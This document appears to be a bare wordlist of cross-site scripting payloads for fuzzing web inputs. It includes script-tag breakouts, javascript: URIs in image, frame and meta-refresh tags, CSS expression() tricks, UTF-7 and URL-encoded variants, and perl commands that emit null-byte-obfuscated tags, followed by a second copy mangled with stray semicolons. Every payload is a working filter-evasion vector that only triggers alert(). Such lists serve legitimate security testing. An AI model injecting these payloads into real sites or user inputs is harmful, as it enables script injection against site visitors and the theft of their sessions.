';alert(2185))//\';alert(2185))//";alert(2185))//\";alert(2185))//--></SCRIPT>">'><SCRIPT>alert(2185))</SCRIPT>
<SCRIPT>alert(2187)</SCRIPT>
<SCRIPT>alert(2189))</SCRIPT>
<BASE HREF="javascript:alert(2190);//">
<BGSOUND SRC="javascript:alert(2191);">
<BODY BACKGROUND="javascript:alert(2192);">
<BODY ONLOAD=alert(2193)>
<DIV STYLE="background-image: url(javascript:alert(2194))">
<DIV STYLE="background-image: url(javascript:alert(2195))">
<DIV STYLE="width: expression(alert(2196));">
<FRAMESET><FRAME SRC="javascript:alert(2197);"></FRAMESET>
<IFRAME SRC="javascript:alert(2198);"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2199);">
<IMG SRC="javascript:alert(2200);">
<IMG SRC=javascript:alert(2201)>
<IMG DYNSRC="javascript:alert(2202);">
<IMG LOWSRC="javascript:alert(2203);">
<STYLE>li {list-style-image: url("javascript:alert(2207)");}</STYLE><UL><LI>XSS
%BCscript%BEalert(2211)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(2212);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(2214);">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(2217)></OBJECT>
a="get"; b="URL(""; c="javascript:"; d="alert(2219);")";
eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert(2220);</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(2221))">
<XSS STYLE="xss:expression(alert(2222))">
<STYLE>.XSS{background-image:url("javascript:alert(2223)");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(2224)")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert(2225);">
<TABLE BACKGROUND="javascript:alert(2230)"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert(2231)"></TD></TABLE>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(2233);">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(2234)"></B></I></XML>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(2238)</SCRIPT>">
<BR SIZE="&{alert(2243)}">
<IMG SRC=JaVaScRiPt:alert(2244)>
<IMG SRC=javascript:alert(2245)>
<IMG SRC=`javascript:alert(2246)`>
<IMG SRC=javascript:alert(2247))>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(2252);+ADw-/SCRIPT+AD4-
\";alert(2253);//
</TITLE><SCRIPT>alert(2254);</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert(2255)';</STYLE>
<IMG SRC="jav ascript:alert(2256);">
<IMG SRC="jav	ascript:alert(2257);">
<IMG SRC="jav
ascript:alert(2258);">
<IMG SRC="jav
ascript:alert(2259);">
perl -e 'print "<IMG SRC=java\0script:alert(2261)>";'> out
perl -e 'print "&<SCR\0IPT>alert(2262)</SCR\0IPT>";' > out
<IMG SRC="  javascript:alert(2263);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2265)>
<IMG SRC="javascript:alert(2268)"
<<SCRIPT>alert(2270);//<</SCRIPT>
<IMG """><SCRIPT>alert(2271)</SCRIPT>">
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2390)>
</script><script>alert(2391)</script>
</br style=a:expression(alert(23922392>
<scrscriptipt>alert(2393)</scrscriptipt>
<br size=\"&{alert(2394)}\">
perl -e 'print \"<IMG SRC=java\0script:alert(2395)>\";' > out
perl -e 'print \"<SCR\0IPT>alert(2396)</SCR\0IPT>\";' > out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2397))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2399))>
<~/XSS STYLE=xss:expression(alert(2400))>
">
XSS/*-*/STYLE=xss:e/**/xpression(alert(2403))>
XSS STYLE=xss:e/**/xpression(alert(2404))>
';;alert(2406))//\';;alert(2406))//";;alert(2406))//\";;alert(2406))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(2406))<;/SCRIPT>;
<;SCRIPT>;alert(2408)<;/SCRIPT>;
<;SCRIPT>;alert(2410))<;/SCRIPT>;
<;BASE HREF=";javascript:alert(2411);//";>;
<;BGSOUND SRC=";javascript:alert(2412);";>;
<;BODY BACKGROUND=";javascript:alert(2413);";>;
<;BODY ONLOAD=alert(2414)>;
<;DIV STYLE=";background-image: url(javascript:alert(2415))";>;
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(2416))";>;
<;DIV STYLE=";width: expression(alert(2417));";>;
<;FRAMESET>;<;FRAME SRC=";javascript:alert(2418);";>;<;/FRAMESET>;
<;IFRAME SRC=";javascript:alert(2419);";>;<;/IFRAME>;
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(2420);";>;
<;IMG SRC=";javascript:alert(2421);";>;
<;IMG SRC=javascript:alert(2422)>;
<;IMG DYNSRC=";javascript:alert(2423);";>;
<;IMG LOWSRC=";javascript:alert(2424);";>;
<;STYLE>;li {list-style-image: url(";javascript:alert(2428)";);}<;/STYLE>;<;UL>;<;LI>;XSS
%BCscript%BEalert(2432)%BC/script%BE
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(2433);";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(2435);";>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(2438)>;<;/OBJECT>;
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(2440);";)";;
eval(a+b+c+d);
<;STYLE TYPE=";text/javascript";>;alert(2441);<;/STYLE>;
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(2442))";>;
<;XSS STYLE=";xss:expression(alert(2443))";>;
<;STYLE>;.XSS{background-image:url(";javascript:alert(2444)";);}<;/STYLE>;<;A class="XSS">;<;/A>;
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(2445)";)}<;/STYLE>;
<;LINK REL=";stylesheet"; HREF=";javascript:alert(2446);";>;
<;TABLE BACKGROUND=";javascript:alert(2451)";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=";javascript:alert(2452)";>;<;/TD>;<;/TABLE>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(2454);";>;]]>;
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(2455)";>;<;/B>;<;/I>;<;/XML>;
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(2459)<;/SCRIPT>;";>;
<;BR SIZE=";&;{alert(2464)}";>;
<;IMG SRC=JaVaScRiPt:alert(2465)>;
<;IMG SRC=javascript:alert(2466)>;
<;IMG SRC=`javascript:alert(2467)`>;
<;IMG SRC=javascript:alert(2468))>;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(2473);+ADw-/SCRIPT+AD4-
\";;alert(2474);//
<;/TITLE>;<;SCRIPT>;alert(2475);<;/SCRIPT>;
<;STYLE>;@im\port';\ja\vasc\ript:alert(2476)';;<;/STYLE>;
<;IMG SRC=";jav ascript:alert(2477);";>;
<;IMG SRC=";jav&;#x09;ascript:alert(2478);";>;
<;IMG SRC=";jav&;#x0A;ascript:alert(2479);";>;
<;IMG SRC=";jav&;#x0D;ascript:alert(2480);";>;
perl -e ';print ";<;IM SRC=java\0script:alert(2482)>";;';>; out
perl -e ';print ";&;<;SCR\0IPT>;alert(2483)<;/SCR\0IPT>;";;'; >; out
<;IMG SRC="; &;#14; javascript:alert(2484);";>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2486)>;
<;IMG SRC=";javascript:alert(2489)";
<;<;SCRIPT>;alert(2491);//<;<;/SCRIPT>;
<;IMG ";";";>;<;SCRIPT>;alert(2492)<;/SCRIPT>;";>;
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2611)>;
<;/script>;<;script>;alert(2612)<;/script>;
<;/br style=a:expression(alert(26132613>;
<;scrscriptipt>;alert(2614)<;/scrscriptipt>;
<;br size=\";&;{alert(2615)}\";>;
perl -e 'print \";<;IMG SRC=java\0script:alert(2616)>;\";;' >; out
perl -e 'print \";<;SCR\0IPT>;alert(2617)<;/SCR\0IPT>;\";;' >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2618))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2620))>
<~/XSS STYLE=xss:expression(alert(2621))>
">
XSS/*-*/STYLE=xss:e/**/xpression(alert(2624))>
XSS STYLE=xss:e/**/xpression(alert(2625))>
>">&
">
>"'>
>%22%27>
'%uff1cscript%uff1ealert(2631)%uff1c/script%uff1e'
SCRIPT]]>alert(2643);/SCRIPT]]>%3cscript%3ealert(2650)%3c/script%3e
%22%3e%3cscript%3ealert(2651)%3c/script%3e
">
<
%253cscript%253ealert(2669)%253c/script%253e
">
alert(2670)
foo
ipt>alert(2672)ipt>
';alert(2674))//\';alert(2674))//";alert(2674))//\";alert(2674))//-->">'>